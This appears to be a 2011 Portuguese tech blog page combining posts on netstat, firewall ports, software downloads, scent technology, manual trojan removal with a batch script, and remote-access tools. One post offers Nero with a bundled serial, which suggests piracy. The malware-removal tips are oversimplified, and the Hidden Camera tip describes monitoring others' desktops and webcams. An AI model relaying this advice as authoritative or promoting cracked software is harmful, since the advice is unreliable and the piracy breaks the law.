Para se fazer um teste em seu computador ou, por curiosidade, quiser verificar as portas que estão sendo abertas, o comando que mostra estas conexões é o "netstat". Executando este programa com o parâmetro "-a", serão mostradas todas as conexões ativas, por exemplo: Iniciar > Arquivos de Programas > Prompt do MS-DOS.

c\>netstat -a

Conexões ativas:

Protocolo Usado Endereço Local Endereço Remoto Estado da Conexão
------------------ ------------------ --------------------- ----------------------
| | | |
.----´ .------------´ .-----------------´ .-------------------´
| | | |
v v v v
TCP localhost1249 www.uol.com.br80 ESTABLISHED

A listagem original possui várias e várias linhas como esta, cada uma relatando o estado de uma porta de conexão. O exemplo acima nos diz que meu computador (localhost) está se comunicando pela porta 1249 com o computador no endereço www.uol.com.br, que está recebendo os pedidos pela porta 80. A conexão foi estabelecida (Established). A porta 80 está especificada mundialmente como sendo a porta padrão para a Web. Resumindo, estou navegando no site do Universo Online.

O que muitos usuários fazem após a execução deste comando é entrar em desespero, pois mesmo em condições normais e, dependendo da configuração do computador de cada pessoa, muitas portas podem aparecer abertas. Elas são responsáveis pelo funcionamento do Windows, principalmente (mas não exclusivamente) em rede. O método usado para se identificar servidores maliciosos com base nas portas que eles abrem é extremamente falho pois, além desta porta poder ser alterada, existem muitos programas e muitas portas disponíveis, e alguns deles utilizam portas que não podem ser fechadas, pois afetaria o funcionamento do sistema.

Na verdade o estado que mais preocupação demanda é o de LISTENING, pois significa que a porta está aberta e tem um programa pronto, escutando a rede, para receber dados (que podem ser instruções maliciosas...).

Por isso a recomendação é a de não se preocupar com o relatório de portas e sim com os programas instalados no seu computador. E, como já foi dito, isto pode ser feito utilizando programas específicos para estas tarefas, ou bons antivírus atualizados. Dessa forma, estaremos cortando o mal pela raiz." Um dos melhores programas para essa tarefa é o Zone Alarm , que tem um fator que o torna ainda mais interessante: Ele é grátis.  heheheheheh  \o/

Como abrir portas manualmente no Firewall de conexão com a Internet no Windows XP



Este artigo descreve como abrir portas manualmente no ICF (Firewall de conexão com a Internet) no Windows XP.

Talvez seja necessário abrir portas manualmente nos programas, para que eles funcionem corretamente quando o ICF estiver em uso no computador local ou no computador gateway. Talvez seja necessário abrir uma porta manualmente, se houver um serviço que seja executado em um computador que tem o ICF ativado e que você deseja tornar disponível aos usuários na Internet.

Observação As configurações reais da porta variam de programa para programa.

Para abrir manualmente uma porta, execute estas etapas:
Clique em Iniciar e em Meus locais de rede.
Em Tarefas de rede, clique em Exibir conexões de rede. (Ou clique com o botão direito do mouse em Meus locais de rede e clique em Desktop e em Propriedades.)
Clique com o botão direito do mouse na conexão que você usa para a Internet e clique emPropriedades.
Clique na guia Avançadas e clique em Configurações.

Observação Se o botão Configurações não estiver disponível, o ICF não está ativado para essa conexão e não é necessário abrir portas (porque todas estão abertas).
Clique em Adicionar para abrir uma nova porta.
Na caixa Descrição, digite um nome amigável. Por exemplo, digite Compartilhamento de arquivos: Porta 445.
Na caixa Nome ou endereço IP do computador que hospeda este serviço na rede, digite 127.0.0.1.

Observação É possível especificar o endereço IP de um computador interno. Mas geralmente você usará 127.0.0.1.
Nas caixas Porta externa e Porta interna, digite o número da porta. Geralmente, esse número é o mesmo.
Clique em TCP ou em UDP e em OK.
Repita as etapas de 1 a 9 para cada porta que desejar abrir.Para obter informações adicionais sobre alguns aplicativos e jogos que talvez exijam que você abra manualmente as portas para que os programas funcionem corretamente e para obter informações sobre quais portas de entrada abrir, visite o seguinte site da Microsoft:

segunda-feira, 28 de março de 2011

Montagem, manutenção e instalação de computadores



Você não precisa mais ser técnico para montar seu próprio computador. Acompanhando o crescimento do mercado de informática, a Editora Escala lança este guia que, com uma linguagem simples, ensina passo-a-passo como é feita a montagem de um PC.
Além da estrutura física, abordamos também as etapas de configuração e orientações para torná-lo mais seguro. Confira ainda uma seleção de produtos disponíveis no mercado, desde as máquinas completas até o mais simples periférico.

Você vai ver neste guia:
• Como definir o seu perfil de usuário
• Como montar um PC, com explicações e fotos passo-a-passo
• Como instalar os periféricos
• Dicas para acertar na escolha da sua impressora multifuncional
• Como configurar a bios e instalar o sistema operacional
• Dicas para melhorar o desempenho do seu Windows
• Orientações para tornar o seu PC mais seguro
‘ Glossário de termos de informática

Manual de sobrevivência no mundo digital – Leoni



Esse é um típico Livro 2.0. O que é isso? É um livro interativo. Hoje eu estou dando o e-book que se transformará num livro físico depois de passar pela crítica de vocês, meus leitores virtuais. Clique aqui e baixe agora!
Esse “Manual de Sobrevivência no Mundo Digital” nasceu de textos que eu publiquei aqui no Diário de Bordo, para dividir com bandas novas e artistas pré-digitais as experiências que eu vinha fazendo para entrar em contato direto com o público e evitar os atravessadores.
Mas muito do que eu venho tentando não é exclusivo do mundo musical. Fomos a primeira indústria a passar pela mudança radical que a internet causou, mas estamos longe de ser a única. Tudo que é digitalizável já está enfrentando, ou vai ter que enfrentar, o fim do monopólio da distribuição, o fim da escassez e a gratuidade. Jornal, TV, publicidade, cinema, livro etc., todos vão ter que encontrar formas de se adaptar a esse mundo novo.

Nero 9 + Serial


O programa Nero é o mais usado no Brasil para Gravar Cd e Dvd. Se você estava procurando o Nero, não deixe de Baixar Gratis o Nero 9 que já vem completo com serial incluido no download.

sexta-feira, 25 de março de 2011

Aura Free Video Converter 1.31



Com o Aura Free Video Converter, você pode converter dezenas de formatos de vídeos. O programa conta com opções para definir rapidamente o formato dos arquivos criados, com configurações feitas em poucos segundos. O aplicativo ainda apresenta a possibilidade de download do YouTube, o que pode ser feito rapidamente caso você tenha os links dos vídeos que deseja baixar.
A função primordial do aplicativo pode ser realizada em quatro rápidas etapas, sem dificuldades até mesmo para quem nunca lidou com programas do gênero. Nas linhas abaixo, explicaremos um pouco mais sobre como converter os seus vídeos.

Download

AeroWeather



O AeroWeather é uma ferramenta que une características de personalização do sistema operacional com recursos de previsão do tempo. Através de um sistema que modifica as cores das janelas conforme ocorrem mudanças de temperatura, o programa apresenta um resultado bastante interessante para quem procura algo diferente para seu computador.
Utilizando como base a mudança climática externa da localização em que o usuário está, o programa modifica as cores do ambiente Aero conforme mudanças ocorrem. Ou seja, durante a manhã, o computador está com uma cara, e assim que chega meio-dia e a temperatura esquenta, as cores já estão completamente diferentes. Isso tudo de forma automática, sem nenhuma intervenção do usuário.


Download

Color That Site! 0.13



Uma das possibilidades que os layouts em CSS proporcionam tanto para os programadores quanto para os usuários é o alto grau de personalização. Modificar as cores de um determinado item ou mesmo apagar planos de fundo acabam se tornando tarefas simples para todos.
Se você é mais um dos usuários que gostam de levar os conceitos de personalização ao extremo e quer mexer em tudo aquilo que for possível para que as coisas fiquem do seu agrado, uma boa alternativa é contas com as funções do Color That Site!
Trata-se de um complemento para o Mozilla Firefox que permite aos usuários alterar dados no CSS de praticamente qualquer página, transformando sites conhecidos com as combinações de cores que mais lhe agradarem. O complemento é leve, gratuito e a instalação é simples.

Download

Depois do 3D, a era dos aromas artificiais chegará para abalar!


Imagine como seria incrível poder acessar o Tudo Gostoso e sentir os aromas de todas aquelas comidas deliciosas. Seria muito mais fácil decidir o que cozinhar, não é mesmo? Pois se você está achando que isso está completamente fora da realidade, vai se surpreender enquanto descobre que já é possível sincronizar computadores e televisores a máquinas aromatizadoras que trazem o “4D” à tecnologia.
Isso mesmo, uma “nova dimensão” já pode ser aplicada aos vídeos e jogos, fazendo com que os espectadores e gamers sintam muito mais do que dimensões visuais. Os aromas seriam os responsáveis por isso, ou seja, introduziriam os espectadores ainda mais nas atmosferas de visualização e interação com as obras que estão sendo transmitidas.

Os cheiros nos cinemas


Em 2010, os sul-coreanos puderam assistir ao campeão de bilheterias “Avatar” em sessões 4D. As imagens em três dimensões foram somadas a vários outros recursos, como luzes, movimentações das poltronas e cheiros de explosivos em determinadas cenas em que a sensação da pólvora era necessária.


Como pode ser percebido, nesse caso a “quarta dimensão” vai muito além dos cheiros e coloca ainda várias outras sensações para serem percebidas por todas as pessoas que estiverem na sala de cinema. Na verdade, o cheiro da pólvora é apenas um complemento, mas no futuro isso pode mudar.
Com máquinas que realizam combinações de aromas, podem ser criadas ambientações completas para que os espectadores sintam-se realmente inseridos nos contextos dos filmes. Por exemplo, em filmes de guerra podem ser adicionado aroma de pólvora, em cenas com jardins podem ser utilizados aromatizantes de flores e assim por diante.

“Quero isso na minha casa!”


Pois você pode. Graças ao sistema ScentScape (criado pela empresa Scent Sciences), é possível sincronizar vídeos a um aromatizador abastecido com diferentes essências que, combinadas, chegam a emitir dezenas de cheiros diferentes. Todos programados pelo próprio usuário, pois ainda não há filmes que sejam oficialmente sincronizados com o ScentScape.
O lançamento deste aparelho está previsto para o final de 2011 e deve chegar às lojas norte-americanas pelo preço de 70 dólares. O software de edição sairá por mais 20 dólares e os cartuchos de aromas com 20 essências básicas deve custar em torno de 24 dólares. A fabricante garante ainda que podem ser encomendados aromas personalizados.



A Scent Sciences, empresa responsável pelo aparelho, garante ainda que também será possível utilizar o ScentScape para jogos de computador, mas com as mesmas limitações já mencionadas, pois é necessário sincronizar as emissões aromáticas manualmente. Quem sabe no futuro este sistema poderá ser automático, com cheiros já pré-selecionados pelas produtoras de filmes e games..

Mais aromas nos games


Se você achou que o ScentScape não está à altura dos games, talvez a tecnologia que está sendo desenvolvida por engenheiros da Universidade de Birmingham (Inglaterra) faça com que você se anime um pouco mais. Liderada pelo professor Bob Stone, a equipe está testando mecanismos de adição de odores a jogos consagrados, como Half Life e Far Cry.
Este sistema funciona de maneira relativamente simples: parafina combinada com essências é acionada de acordo com a necessidade do jogo (que envia ordens à maquina de liberação dos aromas, sendo que o código do game é alterado para isso). Para aumentar o alcance das essências, cada porção de parafina é presa a um pequeno ventilador.


Bob Stone disse à revista inglesa Soldier Magazine que os cheiros têm sido subestimados há muito tempo. Ele disse também que, depois da visão, o olfato é o sentido humano que oferece maior riqueza de detalhes.
A princípio, este projeto da Universidade de Birmingham não será disponibilizado para os consumidores finais, mas será utilizado em jogos de treinamento militar. A intenção do exército britânico é preparar seus soldados para situações mais reais do que as tradicionais interações oferecidas por jogos (imagem e som).

Também na publicidade


Pode ser que este tipo de tecnologia seja muito cara para ser aplicada em residências, mas, em cinemas, a publicidade com fragrâncias poderia ser um verdadeiro sucesso. Imagine-se em uma sala de cinema que mostra comerciais de restaurantes e exala o aroma dos pratos mais deliciosos.
Ou, então, que tal propagandas de perfumes que são complementadas pelo suave aroma circulando pelo ar? Pois certamente a publicidade iria usar e abusar deste tipo de recursos. Logicamente, a propaganda com fragrâncias só chegaria às casas quando já existisse uma boa parcela da população com mecanismos para isso – e com máquinas a 70 dólares, isso não é tão difícil.

Imprimindo cheiros


As impressoras mais modernas conseguem realizar impressões muito realistas, com cores tão vibrantes quanto às dos objetos fotografados. Por exemplo: uma bela maçã vermelha e brilhante pode ser impressa com estas mesmas qualidades. Mas o aroma doce da fruta não poderá ser sentido na fotografia em papel.
Para Kenichi Okada (da Universidade Keyo de Tóquio) e alguns de seus colegas isso é não é verdade, pois é possível imprimir imagens com cheiros. O conceito é simples: junto com a tinta, são impressas pequenas cápsulas aromáticas. Desta forma, torna-se possível criar fotografias com aromas muito próximos aos dos objetos reais.


O projeto, batizado de Fragrance Jet II, utiliza seis fragrâncias: menta, toranja, lavanda, canela, maçã e baunilha. Infelizmente os fixadores ainda não estão gerando bons resultados, o que resulta em aromas perceptíveis por cerca de apenas um décimo de segundo (ou duas inspirações normais).
Okada afirma que este é apenas o primeiro passo nas pesquisas do grupo da Universidade de Tóquio. Ele pretende agora desenvolver um sistema automático para a aromatização das impressões, para evitar que seja necessário o controle manual de cada folha a passar pela impressora.

O futuro é aromático


Por enquanto, a tecnologia de aplicação de cheiros aos filmes, jogos e publicidade ainda é pouco desenvolvida, mas é necessário afirmar que o desenvolvimento caminha a passos largos. O grande empecilho para a inserção destas tecnologias nas casas deve ser o preço, já que são necessários aparelhos e essências com constante reposição.
Mesmo assim, estima-se que, em menos de uma década, várias salas de cinema já estejam trabalhando com sessões 4D aromáticas. Logicamente este tipo de sessão deve chegar aos poucos e com preços elevados, mas assim como aconteceu com o cinema 3D, os preços podem baixar ao mesmo tempo em que a tecnologia é popularizada.
.....
E você, o que pensa sobre a possibilidade de sentir cheiros enquanto joga seus games favoritos ou assiste aos filmes mais legais? Conte para o Baixaki em que situação você acha que os cheiros  poderiam ser mais interessantes.

quinta-feira, 24 de março de 2011

Como Posso saber se estou infectado por um Keylogger ou um Trojan?

Bem pessoal vamos a uma dica simples:

1° vá até iniciar depois executar ou tecle iniciar + R e digite msconfig e va até inicializar . Feito isso olhe qual arquivos q estão sendo inicializado com o windows , bem o arquivo normal eh o ctfmon.exe e outros de drivers de video etc…

Caso tenha o svchost.exe inicializando junto, pode ter certeza q tem um trojan de conexao ao seu PC ou um Keylogger, mais provavel um trojan de Porta.

Bem Caso não encontre nada lá e você acha que tem algo de suspeito, provavelmente ele está escondido da lista de processos e do msconfig, então va em executar e digita regedit e vá até
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN .

Veja se tem algum arquivo com o nome estranho , então delete ele .
Como posso removelo ?

1° se tiver o arquivo no msconfig desabilite ele, se ele sair do msconfig o trojan já não estará mais ativo, caso ele volte ai já eh problema mais não se desespere tecle ctrl + alt + del e vá atá processos e procure o nome suspeito por lá? até encotralo. Após encontralo finalize ele e vá até a pasta onde ele se encontra e delete ele, caso ele não delete ai vc vai fazer um bat.

Como que eu posso criar esse Bat ?

1° abra o bloco de notas e digite :

@echo off
cls
taskkill /f /im “processodovirus.exe”
cls
del c:\windows\system32\processodovirus.exe
exit

Bem isso eh um código bem simples em bat vamos a explicaçao:

@echo off – fecha automaticamente a janela
cls – limpa a tela do pront
task – processos
kill – matar
/f – force
/im – imediatamente
del – delete
exit – sair

Bem isso irá finalizar o processo e deletalo o trojan, bem o trojan as vezes pode estar rodando dentro do svchost.exe ai ele vai tar com nome de .dll vai ser mais complicado de achar ela, mais vale lembrar o svchost.exe nunca deve estar no msnconfig no Run.

Doze dicas para controlar o PC remotamente


Tudo o que você precisava naquele momento era de uma forma de teletransporte. Seis da tarde, congestionamento total, o chefe esperando pela apresentação que ficou em casa.

Ok, não será possível desintegrar você até lá, mas seu PC pode fazer o caminho inverso sem apelar para a ficção científica. Com uma boa ferramenta de acesso remoto, dá para ter à mão todos os arquivos e programas quando você está no escritório, espera o dentista ou amarga aquele atraso no aeroporto. Tanto faz se é para trabalhar ou se divertir vendo um vídeo ou curtindo as músicas do HD. Entre as boas opções de programas de acesso remoto estão o Ultr@VNC (www.info.abril.com.br/download/3531.shtml) e o logMeIn Pro (www.info.abril.com.br/download/5099.shtml). Confira, a seguir, 12 dicas para ter controle total sobre um PC remoto.

1. Desvio no roteador



Para quem tem um roteador em casa, o acesso remoto a serviços em um PC pode exigir um redirecionamento. Por exemplo, para usar o Ultr@VNC será preciso redirecionar o IP externo da rede (que fica com o roteador) para o micro rodando o programa de acesso remoto Ultr@VNC, nas portas TCP/IP configuradas no programa — normalmente as de número 5800 e 5900. Para fazer isso, é necessário mexer na configuração do roteador. Dependendo do fabricante, o ajuste fica em um local diferente, além de ter nome distinto. Nos modelos da D-Link, o ajuste é normalmente chamado de Virtual Server. Já nos da Linksys, é denominado Port Range Forward. Em todos os casos, você terá de definir a porta TCP/IP a ser roteada e o endereço IP interno (ou seja, da rede local) da máquina que roda o Ultr@VNC.

2. Endereço fixo

Outro truque importante para facilitar o acesso remoto é configurar um DNS dinâmico. Normalmente, isso é feito no roteador. Praticamente todos os modelos recentes desse tipo de hardware contam com suporte a alguns provedores de DNS dinâmico. Esse serviço fornece um endereço fixo (por exemplo, infolab.no-ip.info), que aponta para um IP de uma conexão que tenha IP dinâmico. Assim, fica possível acessar a máquina não pelo endereço IP, mas pelo nome fornecido pelo DNS dinâmico. Entre os melhores serviços desse tipo estão o DynDNS (www.dyndns.com) e o No-IP (www.no-ip.com). Normalmente, a configuração do DNS dinâmico nos roteadores fica entre os ajustes básicos, como na seção Setup > DDNS dos roteadores Linksys, ou Tools > DDNS, em muitos roteadores D-Link.

3. P2P a distância

Os bons programas de compartilhamento de arquivos contam com recursos para ficar de olho nos downloads a distância. No eMule (www.info.abril.com.br/download/3111.shtml), clique no botão Preferências e acesse a seção Servidor Web. Marque ativar e anote o número da porta TCP/IP, que terá de ser redirecionada para a máquina pelo roteador da rede (se houver um). Já no uTorrent (www.info.abril.com.br/download/4661.shtml), o cliente oficial do protocolo BitTorrent, baixe o pacote web em www.info.abril.com.br/download/5135.shtml. Descompacte o arquivo, clique no arquivo webui.zip e tecle Ctrl+C. Abra o menu Iniciar, escolha Executar, digite %AppData%uTorrent e clique em OK. Agora, cole (com Ctrl+V) o arquivo na pasta que foi aberta. No uTorrent, acesse Options > Preferences > Advanced > WebUI. Marque a opção Enable Web Access e pronto.

4. Controle remoto embutido



O Windows conta com um recurso de acesso remoto embutido, chamado Remote Desktop. É bem simples usá-lo. Clique com o botão direito do mouse no atalho Meu Computador (você pode acessá-lo no menu Iniciar) e escolha Propriedades. Acesse a aba Remoto e marque o item Permitir que Usuários se Conectem Remotamente a Este Computador. Se quiser restringir os usuários da máquina que terão acesso remoto, clique no botão Selecionar Usuários Remotos e, na janela que aparece, pressione Adicionar, escolhendo em seguida o usuário que poderá acessar o PC a distância. É importante lembrar que os usuários com acesso remoto devem ser configurados para utilizar senha para o login do Windows. O cliente do Remote Desktop fica no menu Acessórios. Será preciso saber o IP da máquina remota. No caso de uso de roteadores, ainda será necessário redirecionar a porta TCP/IP 3389, usada pelo protocolo do Remote Desktop.

5. Documentos online e offline

Para quem trabalha em vários lugares, uma boa opção é manter os documentos online, de forma completa e atualizada. Para isso, há algumas opções. O plug-in GDocs (www.info.abril.com.br/download/5137.shtml) para o OpenOffice faz a sincronia automática para esse pacote de escritório com o serviço Google Docs. Depois de instalar o plug-in, clicando nele duas vezes, pressione o botão Import from Google Docs e preencha suas informações de login e senha no serviço. Para enviar um documento de volta para o Google Docs, clique no botão Export to Google Docs. Já para o Microsoft Office, existem os plug-ins do Zoho Office (www.zoho.com), que funcionam de forma semelhante ao do OpenOffice só que, claro, com os serviços do Zoho.

6. Foto do desktop

Para professores, pais e administradores de rede, pode ser interessante visualizar o que se passa no desktop dos alunos, filhos e PCs da rede, evitando o uso indevido do computador. Há diversas opções de software para essa tarefa, mas uma das melhores é o Hidden Camera (www.info.abril.com.br/download/5136.shtml). Esse software permite monitorar tanto o desktop de um usuário quanto sua webcam. É possível visualizar imagens de até 256 máquinas, simultaneamente, com a tela do Hidden Camera ficando dividida para mostrar todos os desktops ao mesmo tempo. Também é possível capturar imagens dos desktops remotos ou ainda mandar mensagens para um dos usuários. O programa tem uma instalação simples e única, com uma opção no começo do processo, indicando se o PC a ser configurado é do supervisor ou de um usuário da rede.

7. Desligue o PC

Você deixou um programa em processamento e a tarefa foi concluída. Que tal desligar o micro a distância? O freeware Poweroff (www.info.abril.com.br/download/5134.shtml) faz esse trabalho. É preciso instalá-lo como serviço na máquina que será alvo do controle remoto. Depois, no micro remoto, rode o Poweroff e escolha o IP do PC que recebeu a instalação como serviço. Além de desligar o computador, é possível reiniciá-lo, rodar um comando específico, desligar o monitor, entre outras ações. A porta TCP/IP de acesso é definida pelo usuário, e, como é padrão na maioria dos programas de acesso remoto, precisa ser redirecionada no caso da máquina a ser controlada estar numa rede.

8. E-mail no esquema

Se nenhum programa de acesso remoto normal funciona em sua conexão à internet, uma última solução pode ser usar uma conta de e-mail como intermediária do acesso remoto. É o que propõe o programinha GetByEmail (www.info.abril.com.br/download/5138.shtml). Esse software lembra um cliente para servidores FTP. A diferença é que a navegação pelas pastas do micro remoto é feita pelo envio e recebimento de e-mails. Apesar de uma certa lentidão, o programa quebra um galho para quem tem conexões completamente incompatíveis com acesso remoto. Um lembrete: é sábio criar uma conta de e-mail especificamente para uso com o GetByMail, evitando a utilização de endereços pessoais ou de trabalho.

9. Corte e cole na web



Existem bons programas para manter um registro dos textos copiados para a área de transferência do Windows. Mas e para acessar essas informações de qualquer lugar? Nesse caso, é necessário recorrer a um serviço com um nome sugestivo, o ControlC (http://controlc.com). Apesar de, até o fechamento da edição, o serviço estar em fase beta, era possível se inscrever usando o código beta4040 na hora do registro. O programinha instalado no computador para fazer o upload do que for copiado é bem leve e dispensa configurações (exceto pelo login e senha no serviço). O acesso aos itens copiados é feito somente pela web, não existindo sincronia de dados.

10. Pastas em sincronia

Um utilitário adquirido pela Microsoft é uma arma poderosa para sincronizar arquivos com o micro de casa. Trata-se do FolderShare (www.info.abril.com.br/download/4404.shtml). Basta instalá-lo em todas as máquinas que serão usadas e definir uma pasta a ser sincronizada. Os PCs deverão usar o mesmo login e senha para que a sincronia seja efetuada. Também é possível acessar arquivos da máquina remota, indo ao site oficial do produto e usando o login cadastrado. O FolderShare faz a configuração de portas TCP/IP automaticamente, pelo protocolo UPnP (Sigla de Universal Plug and Play, conjunto de protocolos de rede).

11. FTP doméstico

Uma das formas mais tradicionais de ter acesso remoto aos arquivos de um computador é usar um servidor FTP. Além de antigos e bem estabelecidos, esses servidores também dispensam aplicativos para o PC cliente, já que, em último caso, o Windows conta com um software de acesso a FTP embutido (que roda teclando-se ftp, na linha de comando). Para montar um servidor de FTP, é preciso ter um software dedicado a esse fim, como o Filezilla Server (www.info.abril.com.br/download/5139.shtml). Além disso, depois de configurar o Filezilla Server, é necessário redirecionar a porta TCP/IP de número 21 para a máquina com o servidor de FTP, caso a máquina esteja em uma rede.

12. Winamp sob controle

Apesar de não contar com a fama de outrora, o Winamp ainda é um dos melhores tocadores de MP3 e traz diversos plug-ins interessantes. Dois deles são relacionados ao acesso remoto ao programa. O BrowseAmp (www.info.abril.com.br/download/3589.shtml) permite controlar a distância as músicas tocadas em um computador. É útil, por exemplo, para fazer a programação sonora em ambientes ou eventos. Já o Winamp Remote, que pode ser baixado durante a instalação do Winamp, faz o streaming remoto de músicas e vídeos na biblioteca do programa. Após a instalação do Winamp Remote, será preciso criar um login e uma senha, para acessar as músicas e vídeos no sitewww.winamp.com/remote.

segunda-feira, 21 de março de 2011

AVG Anti-Virus Free 2011 10.0



O AVG Anti-Virus Free, campeão de downloads no Baixaki, está mais inteligente, rápido e leve no seu computador. Ele é o primeiro antivírus gratuito com a tecnologia Zero-Day Threat, ou seja, um antivírus dedicado a identificar ameaças por comportamento. Assim, não é necessário esperar para que um malware entre em ação para identificá-lo.
A qualidade do antivírus está melhor, comparada até mesmo com os produtos pagos da mesma desenvolvedora (caso do Internet Security) e também com softwares pagos concorrentes. Como os desenvolvedores afirmam, esta é a versão para recolocar o AVG no topo dos softwares antivírus. A detecção do modo Zero-Day era algo importante que faltava. Agora, com essa melhoria, o AVG tem tudo para cobrir essa carência.
Além dessa nova funcionalidade, o AVG está mais rápido. A varredura da versão 2011 está três vezes mais rápida do que a das versões anteriores. E ela também está mais inteligente: tem prioridade alta enquanto você não está no computador e prioridade reduzida para não comprometer a execução de outras tarefas.

Download

Avira AntiVir Personal Edition Classic 10.0



Embora manter o computador protegido de ameaças seja algo essencial para o bom funcionamento do sistema, não é todo mundo que está disposto a pagar caro por um software especializado na função.
Felizmente podemos contar com alternativas como o Avira AntiVir Personal Edition Classic, software conhecido pela proteção completa que fornece ao computador, sem que seja preciso pagar nada por isso. O programa chega agora à versão 10, com uma série de novidades para deixar sua máquina blindada contra a ameaça de códigos maliciosos.


Download

<<<< Identificador >>>>

VC FOI DETECTADO, PARABÉNS!!!!